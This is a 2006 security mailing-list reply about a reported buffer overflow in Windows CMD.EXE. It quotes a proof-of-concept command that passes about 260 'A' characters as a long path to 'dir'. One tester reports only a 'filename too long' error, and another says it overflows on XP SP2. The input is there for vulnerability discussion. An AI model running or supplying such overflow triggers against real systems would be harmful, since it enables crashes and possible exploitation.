RE: Windows Command Processor CMD.EXE Buffer Overflow
From: Luis Alberto Cortes Zavala (napasn
securitynation.com)
Date: Fri Oct 20 2006 - 14:33:00 CDT
Yeah! Buffer Overflow Windows XP SP2
I will debug this.
Luís Alberto Cortes Zavala
IT / Security Consultant
napa
securitynation.com
http://www.securitynation.com
-----Original Message-----
From: listbounce securityfocus.com [mailto:listbounce securityfocus.com] On behalf of The SNiFF
Sent: Friday, October 20, 2006 03:58 a.m.
To: vuln-dev securityfocus.com
Subject: Re: Windows Command Processor CMD.EXE Buffer Overflow
> Copy-paste the following line in cmd.exe and execute it..
> (it is a single command, has been split into multiple lines for
> readability sake).
>
> %COMSPEC% /K "dir
>
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
>
> (260 characters of 'A's)
Tried it on Win2k3 SP1:
C:\Documents and Settings\Administrator>%COMSPEC% /K
"dir\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
System replied:
The filename or extension is too long.